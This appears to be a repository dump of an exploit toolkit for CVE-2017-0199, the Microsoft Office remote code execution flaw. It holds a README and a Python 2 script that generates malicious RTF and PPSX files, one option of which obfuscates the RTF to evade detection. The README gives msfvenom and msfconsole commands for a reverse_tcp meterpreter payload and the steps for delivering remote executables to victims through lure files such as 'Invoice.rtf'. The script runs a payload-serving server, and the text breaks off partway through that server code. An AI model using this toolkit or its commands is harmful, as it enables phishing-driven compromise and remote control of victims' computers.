├── TODO.txt ├── template └── template.ppsx ├── README.md └── cve-2017-0199_toolkit.py /TODO.txt: -------------------------------------------------------------------------------- 1 | ### Future release: 2 | -------------------------------------------------------------------------------- /template/template.ppsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/HEAD/template/template.ppsx -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Exploit toolkit CVE-2017-0199 - v4.0 2 | 3 | Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration. 4 | 5 | ### Disclaimer 6 | 7 | This program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (bhdresh) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using this program you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not bhdresh's responsibility. 8 | 9 | Finally, this is a personal development, please respect its philosophy and don't use it for bad things! 10 | 11 | ### Licence 12 | CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/ 13 | 14 | ### Release note: 15 | 16 | Introduced following capabilities to the script 17 | 18 | - Generate Malicious PPSX file 19 | - Exploitation mode for generated PPSX file 20 | - Updated template.ppsx 21 | 22 | Version: Python version 2.7.13 23 | 24 | ### Scenario 1: Deliver local payload 25 | ###### Example commands 26 | 1) Generate malicious RTF file 27 | # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc 28 | 2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler 29 | # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe 30 | # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run" 31 | 3) Start toolkit in exploit mode to deliver local payload 32 | # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe 33 | ###### Sequence diagram 34 | 35 | ![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario1.jpg) 36 | 37 | 38 | ### Scenario 2: Deliver Remote payload 39 | ###### Example commands 40 | 1) Generate malicious RTF file 41 | # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc 42 | 2) Start toolkit in exploit mode to deliver remote payload 43 | # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe 44 | ###### Sequence diagram 45 | 46 | ![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario2.jpg) 47 | 48 | 49 | ### Scenario 3: Deliver custom HTA file 50 | ###### Example commands 51 | 1) Generate malicious RTF file 52 | # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1 53 | 2) Start toolkit in exploit mode to deliver custom HTA file 54 | # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta 55 | ###### Sequence diagram 56 | 57 | ![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario3.jpg) 58 | 59 | 60 | ### Command line arguments: 61 | 62 | # python cve-2017-0199_toolkit.py -h 63 | 64 | This is a handy toolkit to exploit CVE-2017-0199 (Microsoft office RCE) 65 | 66 | Modes: 67 | 68 | -M gen Generate Malicious file only 69 | 70 | Generate malicious RTF/PPSX file: 71 | 72 | -w Name of malicious RTF/PPSX file (Share this file with victim). 73 | 74 | -u The path to an HTA/SCT file. Normally, this should be a domain or IP where this tool is running. 75 | For example, http://attackerip.com/test.doc (This URL will be included in malicious RTF/PPSX file and will be requested once victim will open malicious RTF file. 76 | -t RTF|PPSX (default = RTF) Type of the file to be generated. 77 | -x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable. 78 | 79 | 80 | -M exp Start exploitation mode 81 | 82 | Exploitation: 83 | 84 | -t RTF|PPSX (default = RTF) Type of file to be exolited. 85 | -H Local path of a custom HTA/SCT file which needs to be delivered and executed on target. 86 | NOTE: This option will not deliver payloads specified through options "-e" and "-l" 87 | 88 | -p Local port number. 89 | 90 | -e The path of an executable file / meterpreter shell / payload which needs to be executed on target. 91 | 92 | -l If payload is hosted locally, specify local path of an executable file / meterpreter shell / payload. 93 | 94 | 95 | ### Credit 96 | 97 | @nixawk for RTF sample, @Li Haifei, @bhdresh 98 | 99 | ### Bug, issues, feature requests 100 | 101 | Obviously, I am not a fulltime developer so expect some hiccups 102 | 103 | Please report bugs, issues through https://github.com/bhdresh/CVE-2017-0199/issues/new 104 | -------------------------------------------------------------------------------- /cve-2017-0199_toolkit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | 4 | ## Exploit toolkit CVE-2017-0199 - v4.0 (https://github.com/bhdresh/CVE-2017-0199) ## 5 | 6 | ''' 7 | import os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile 8 | from random import randint 9 | from random import choice 10 | from string import ascii_uppercase 11 | from zipfile import ZipFile, ZIP_STORED, ZipInfo 12 | 13 | 14 | BACKLOG = 50 # how many pending connections queue will hold 15 | MAX_DATA_RECV = 999999 # max number of bytes we receive at once 16 | DEBUG = True # set to True to see the debug msgs 17 | def main(argv): 18 | # Host and Port information 19 | global port 20 | global host 21 | global filename 22 | global docuri 23 | global payloadurl 24 | global payloadlocation 25 | global custom 26 | global mode 27 | global obfuscate 28 | global payloadtype 29 | filename = '' 30 | docuri = '' 31 | payloadurl = '' 32 | payloadlocation = '' 33 | custom = '' 34 | port = int("80") 35 | host = '' 36 | mode = '' 37 | obfuscate = int("0") 38 | payloadtype = 'rtf' 39 | 40 | # Capture command line arguments 41 | try: 42 | opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:H:x:t:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation=","custom=","obfuscate=","payloadtype="]) 43 | except getopt.GetoptError: 44 | print 'Usage: python '+sys.argv[0]+' -h' 45 | sys.exit(2) 46 | for opt, arg in opts: 47 | if opt == '-h': 48 | print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Office RCE)\n" 49 | print "Modes:\n" 50 | print " -M gen Generate Malicious file only\n" 51 | print " Generate malicious payload:\n" 52 | print " -w Name of malicious RTF/PPSX file (Share this file with victim).\n" 53 | print " -u The path to an HTA/SCT file. Normally, this should be a domain or IP where this tool is running.\n" 54 | print " For example, http://attacker.com/test.doc (This URL will be included in malicious file and\n" 55 | print " will be requested once victim will open malicious RTF/PPSX file.\n" 56 | print " -t RTF|PPSX (default = RTF) Type of the file to be generated.\n" 57 | print " -x 0|1 (RTF only) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.\n" 58 | print " -M exp Start exploitation mode\n" 59 | print " Exploitation:\n" 60 | print " -t RTF|PPSX (default = RTF) Type of file to be exolited.\n" 61 | print " -H Local path of a custom HTA/SCT file which needs to be delivered and executed on target.\n" 62 | print " NOTE: This option will not deliver payloads specified through options \"-e\" and \"-l\".\n" 63 | print " -p Local port number.\n" 64 | print " -e The path of an executable file / meterpreter shell / payload which needs to be executed on target.\n" 65 | print " -l If payload is hosted locally, specify local path of an executable file / meterpreter shell / payload.\n" 66 | sys.exit() 67 | elif opt in ("-M","--mode"): 68 | mode = arg 69 | elif opt in ("-w", "--filename"): 70 | filename = arg 71 | elif opt in ("-u", "--docuri"): 72 | docuri = arg 73 | elif opt in ("-p", "--port"): 74 | port = int(arg) 75 | elif opt in ("-e", "--payloadurl"): 76 | payloadurl = arg 77 | elif opt in ("-l", "--payloadlocation"): 78 | payloadlocation = arg 79 | elif opt in ("-H","--custom"): 80 | custom = arg 81 | elif opt in ("-x","--obfuscate"): 82 | obfuscate = int(arg) 83 | elif opt in ("-t","--payloadtype"): 84 | payloadtype = arg 85 | if "gen" in mode: 86 | if (len(filename)<1): 87 | print 'Usage: python '+sys.argv[0]+' -h' 88 | sys.exit() 89 | if (len(docuri)<1): 90 | print 'Usage: python '+sys.argv[0]+' -h' 91 | sys.exit() 92 | if (len(payloadtype)<1): 93 | print 'Usage: python '+sys.argv[0]+' -h' 94 | sys.exit() 95 | if payloadtype.upper() == 'RTF': 96 | if obfuscate == 1: 97 | print "Generating obfuscated RTF file.\n" 98 | generate_exploit_obfuscate_rtf() 99 | sys.exit() 100 | if obfuscate == 0: 101 | print "Generating normal RTF payload.\n" 102 | generate_exploit_rtf() 103 | sys.exit() 104 | sys.exit() 105 | if payloadtype.upper() == 'PPSX': 106 | print "Generating normal PPSX payload.\n" 107 | generate_exploit_ppsx() 108 | sys.exit() 109 | if payloadtype.upper() != 'RTF' and payloadtype.upper() != 'PPSX': 110 | print 'Usage: python '+sys.argv[0]+' -h' 111 | sys.exit() 112 | mode = 'Finished' 113 | if "exp" in mode: 114 | if payloadtype.upper() == 'RTF': 115 | if (len(custom)>1): 116 | print "Running exploit mode (Deliver Custom HTA) - waiting for victim to connect" 117 | exploitation_rtf() 118 | sys.exit() 119 | if (len(payloadurl)<1): 120 | print 'Usage: python '+sys.argv[0]+' -h' 121 | sys.exit() 122 | if (len(payloadurl)>1 and len(payloadlocation)<1): 123 | print "Running exploit mode (Deliver HTA with remote payload) - waiting for victim to connect" 124 | exploitation_rtf() 125 | sys.exit() 126 | print "Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect" 127 | exploitation_rtf() 128 | mode = 'Finished' 129 | if payloadtype.upper() == 'PPSX': 130 | if (len(custom)>1): 131 | print "Running exploit mode (Deliver Custom SCT) - waiting for victim to connect" 132 | exploitation_ppsx() 133 | sys.exit() 134 | if (len(payloadurl)<1): 135 | print 'Usage: python '+sys.argv[0]+' -h' 136 | sys.exit() 137 | if (len(payloadurl)>1 and len(payloadlocation)<1): 138 | print "Running exploit mode (Deliver SCT with remote payload) - waiting for victim to connect" 139 | exploitation_ppsx() 140 | sys.exit() 141 | print "Running exploit mode (Deliver SCT + Local Payload) - waiting for victim to connect" 142 | exploitation_ppsx() 143 | mode = 'Finished' 144 | if not "Finished" in mode: 145 | print 'Usage: python '+sys.argv[0]+' -h' 146 | sys.exit() 147 | def generate_exploit_rtf(): 148 | # Preparing malicious RTF 149 | s = docuri 150 | docuri_hex = "00".join("{:02x}".format(ord(c)) for c in s) 151 | docuri_pad_len = 224 - len(docuri_hex) 152 | docuri_pad = "0"*docuri_pad_len 153 | uri_hex = "010000020900000001000000000000000000000000000000a4000000e0c9ea79f9bace118c8200aa004ba90b8c000000"+docuri_hex+docuri_pad+"00000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff0609020000000000c00000000000004600000000ffffffff0000000000000000906660a637b5d201000000000000000000000000000000000000000000000000100203000d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 154 | 155 | payload = "{\\rtf1\\adeflang1025\\ansi\\ansicpg1252\\uc1\\adeff31507\\deff0\\stshfdbch31505\\stshfloch31506\\stshfhich31506\\stshfbi31507\\deflang1033\\deflangfe2052\\themelang1033\\themelangfe2052\\themelangcs0\n" 156 | payload += "{\\info\n" 157 | payload += "{\\author }\n" 158 | payload += "{\\operator }\n" 159 | payload += "}\n" 160 | payload += "{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}\n" 161 | payload += "{\n" 162 | payload += "{\\object\\objautlink\\objupdate\\rsltpict\\objw291\\objh230\\objscalex99\\objscaley101\n" 163 | payload += "{\\*\\objclass Word.Document.8}\n" 164 | payload += "{\\*\\objdata 0105000002000000\n" 165 | payload += "090000004f4c45324c696e6b000000000000000000000a0000\n" 166 | payload += "d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 167 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 168 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 169 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 170 | payload += "fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 171 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 172 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 173 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 174 | payload += "ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d\n" 175 | payload += "6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000\n" 176 | payload += "000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000\n" 177 | payload += "0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000\n" 178 | payload += "00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 179 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 180 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 181 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 182 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 183 | payload += uri_hex+"\n" 184 | payload += "0105000000000000}\n" 185 | payload += "{\\result {\\rtlch\\fcs1 \\af31507 \\ltrch\\fcs0 \\insrsid1979324 }}}}\n" 186 | payload += "{\\*\\datastore }\n" 187 | payload += "}\n" 188 | f = open(filename, 'w') 189 | f.write(payload) 190 | f.close() 191 | print "Generated "+filename+" successfully" 192 | 193 | 194 | 195 | def generate_exploit_obfuscate_rtf(): 196 | # Preparing malicious obfuscated RTF 197 | var1 = " " 198 | var2 = "\r\n" 199 | var3 = "\t" 200 | var4 = ''.join(choice(ascii_uppercase) for i in range(randint(3,10))) 201 | var5 = "{\*\\"+var4+"}" 202 | var6 = binascii.b2a_hex(os.urandom(15)) 203 | #var6 = "0011002e1faa" 204 | s = docuri 205 | docuri_hex = "00".join("{:02x}".format(ord(c)) for c in s) 206 | docuri_pad_len = 224 - len(docuri_hex) 207 | docuri_pad = "0"*docuri_pad_len 208 | new_docuri_hex = docuri_hex.replace('00', '{\*\\'+var6+'}00') 209 | uri_hex = "010000020900000001000000000000000000000000000000a4000000"+"e"+var5*randint(0,10)+"0"+var5*randint(0,10)+"c"+var5*randint(0,10)+"9"+var5*randint(0,10)+"e"+var5*randint(0,10)+"a"+var5*randint(0,10)+"7"+var5*randint(0,10)+"9"+var5*randint(0,10)+"f"+var5*randint(0,10)+"9"+var5*randint(0,10)+"b"+var5*randint(0,10)+"a"+var5*randint(0,10)+"c"+var5*randint(0,10)+"e"+var5*randint(0,10)+"1"+var5*randint(0,10)+"1"+var5*randint(0,10)+"8"+var5*randint(0,10)+"c"+var5*randint(0,10)+"8"+var5*randint(0,10)+"2"+var5*randint(0,10)+"0"+var5*randint(0,10)+"0"+var5*randint(0,10)+"a"+var5*randint(0,10)+"a"+var5*randint(0,10)+"0"+var5*randint(0,10)+"0"+var5*randint(0,10)+"4"+var5*randint(0,10)+"b"+var5*randint(0,10)+"a"+var5*randint(0,10)+"9"+var5*randint(0,10)+"0"+var5*randint(0,10)+"b"+var5*randint(0,10)+"8c000000"+new_docuri_hex+docuri_pad+"00000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff0609020000000000c00000000000004600000000ffffffff0000000000000000906660a637b5d201000000000000000000000000000000000000000000000000100203000d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 210 | 211 | payload = "{\\rtv0"+var1*randint(0,100)+"\\adeflang1025\\ansi\\ansicpg1252\\uc1\\adeff31507\\deff0\\stshfdbch31505\\stshfloch31506\\stshfhich31506\\stshfbi31507\\deflang1033\\deflangfe2052\\themelang1033\\themelangfe2052\\themelangcs0\n" 212 | payload += "{\\info\n" 213 | payload += "{\\author }\n" 214 | payload += "{\\operator }\n" 215 | payload += "}\n" 216 | payload += "{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}\n" 217 | payload += "{\n" 218 | payload += "{\\object\\objautlink\\objupdate\\rsltpict\\objw291\\objh230\\objscalex99\\objscaley101\n" 219 | payload += "{\\*\\objclass \\'57\\'6f\\'72\\'64.Document.8}\n" 220 | payload += "{\\*\\objdata 0"+var2*randint(0,10)+var3*randint(0,10)+"1"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"5"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"2"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0\n" 221 | payload += "090000004f4c45324c696e6b000000000000000000000a0000\n" 222 | payload += "d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 223 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 224 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 225 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 226 | payload += "fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 227 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 228 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 229 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 230 | payload += "ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d\n" 231 | 232 | payload += "6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000\n" 233 | payload += "000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000\n" 234 | payload += "0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000\n" 235 | payload += "00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 236 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 237 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 238 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 239 | payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" 240 | payload += uri_hex+"\n" 241 | payload += "0105000000000000}\n" 242 | payload += "{\\result {\\rtlch\\fcs1 \\af31507 \\ltrch\\fcs0 \\insrsid1979324 }}}}\n" 243 | payload += "{\\*\\datastore }\n" 244 | payload += "}\n" 245 | f = open(filename, 'w') 246 | f.write(payload) 247 | f.close() 248 | print "Generated obfuscated "+filename+" successfully" 249 | 250 | def generate_exploit_ppsx(): 251 | # Preparing malicious PPSX 252 | shutil.copy2('template/template.ppsx', filename) 253 | class UpdateableZipFile(ZipFile): 254 | """ 255 | Add delete (via remove_file) and update (via writestr and write methods) 256 | To enable update features use UpdateableZipFile with the 'with statement', 257 | Upon __exit__ (if updates were applied) a new zip file will override the exiting one with the updates 258 | """ 259 | 260 | class DeleteMarker(object): 261 | pass 262 | 263 | def __init__(self, file, mode="r", compression=ZIP_STORED, allowZip64=False): 264 | # Init base 265 | super(UpdateableZipFile, self).__init__(file, mode=mode, 266 | compression=compression, 267 | allowZip64=allowZip64) 268 | # track file to override in zip 269 | self._replace = {} 270 | # Whether the with statement was called 271 | self._allow_updates = False 272 | 273 | def writestr(self, zinfo_or_arcname, bytes, compress_type=None): 274 | if isinstance(zinfo_or_arcname, ZipInfo): 275 | name = zinfo_or_arcname.filename 276 | else: 277 | name = zinfo_or_arcname 278 | # If the file exits, and needs to be overridden, 279 | # mark the entry, and create a temp-file for it 280 | # we allow this only if the with statement is used 281 | if self._allow_updates and name in self.namelist(): 282 | temp_file = self._replace[name] = self._replace.get(name, 283 | tempfile.TemporaryFile()) 284 | temp_file.write(bytes) 285 | # Otherwise just act normally 286 | else: 287 | super(UpdateableZipFile, self).writestr(zinfo_or_arcname, 288 | bytes, compress_type=compress_type) 289 | 290 | def write(self, filename, arcname=None, compress_type=None): 291 | arcname = arcname or filename 292 | # If the file exits, and needs to be overridden, 293 | # mark the entry, and create a temp-file for it 294 | # we allow this only if the with statement is used 295 | if self._allow_updates and arcname in self.namelist(): 296 | temp_file = self._replace[arcname] = self._replace.get(arcname, 297 | tempfile.TemporaryFile()) 298 | with open(filename, "rb") as source: 299 | shutil.copyfileobj(source, temp_file) 300 | # Otherwise just act normally 301 | else: 302 | super(UpdateableZipFile, self).write(filename, 303 | arcname=arcname, compress_type=compress_type) 304 | 305 | def __enter__(self): 306 | # Allow updates 307 | self._allow_updates = True 308 | return self 309 | 310 | def __exit__(self, exc_type, exc_val, exc_tb): 311 | # call base to close zip file, organically 312 | try: 313 | super(UpdateableZipFile, self).__exit__(exc_type, exc_val, exc_tb) 314 | if len(self._replace) > 0: 315 | self._rebuild_zip() 316 | finally: 317 | # In case rebuild zip failed, 318 | # be sure to still release all the temp files 319 | self._close_all_temp_files() 320 | self._allow_updates = False 321 | 322 | def _close_all_temp_files(self): 323 | for temp_file in self._replace.itervalues(): 324 | if hasattr(temp_file, 'close'): 325 | temp_file.close() 326 | 327 | def remove_file(self, path): 328 | self._replace[path] = self.DeleteMarker() 329 | 330 | def _rebuild_zip(self): 331 | tempdir = tempfile.mkdtemp() 332 | try: 333 | temp_zip_path = os.path.join(tempdir, 'new.zip') 334 | with ZipFile(self.filename, 'r') as zip_read: 335 | # Create new zip with assigned properties 336 | with ZipFile(temp_zip_path, 'w', compression=self.compression, 337 | allowZip64=self._allowZip64) as zip_write: 338 | for item in zip_read.infolist(): 339 | # Check if the file should be replaced / or deleted 340 | replacement = self._replace.get(item.filename, None) 341 | # If marked for deletion, do not copy file to new zipfile 342 | if isinstance(replacement, self.DeleteMarker): 343 | del self._replace[item.filename] 344 | continue 345 | # If marked for replacement, copy temp_file, instead of old file 346 | elif replacement is not None: 347 | del self._replace[item.filename] 348 | # Write replacement to archive, 349 | # and then close it (deleting the temp file) 350 | replacement.seek(0) 351 | data = replacement.read() 352 | replacement.close() 353 | else: 354 | data = zip_read.read(item.filename) 355 | zip_write.writestr(item, data) 356 | # Override the archive with the updated one 357 | shutil.move(temp_zip_path, self.filename) 358 | finally: 359 | shutil.rmtree(tempdir) 360 | 361 | with UpdateableZipFile(filename, "a") as o: 362 | o.writestr("ppt/slides/_rels/slide1.xml.rels", "\ 363 | ") 364 | print "Generated "+filename+" successfully" 365 | 366 | 367 | def exploitation_rtf(): 368 | 369 | print "Server Running on ",host,":",port 370 | 371 | try: 372 | # create a socket 373 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 374 | 375 | # associate the socket to host and port 376 | s.bind((host, port)) 377 | 378 | # listenning 379 | s.listen(BACKLOG) 380 | 381 | except socket.error, (value, message): 382 | if s: 383 | s.close() 384 | print "Could not open socket:", message 385 | sys.exit(1) 386 | 387 | # get the connection from client 388 | while 1: 389 | conn, client_addr = s.accept() 390 | 391 | # create a thread to handle request 392 | thread.start_new_thread(server_thread, (conn, client_addr)) 393 | 394 | s.close() 395 | 396 | def server_thread(conn, client_addr): 397 | 398 | # get the request from browser 399 | try: 400 | request = conn.recv(MAX_DATA_RECV) 401 | if (len(request) > 0): 402 | # parse the first line 403 | first_line = request.split('\n')[0] 404 | 405 | # get method 406 | method = 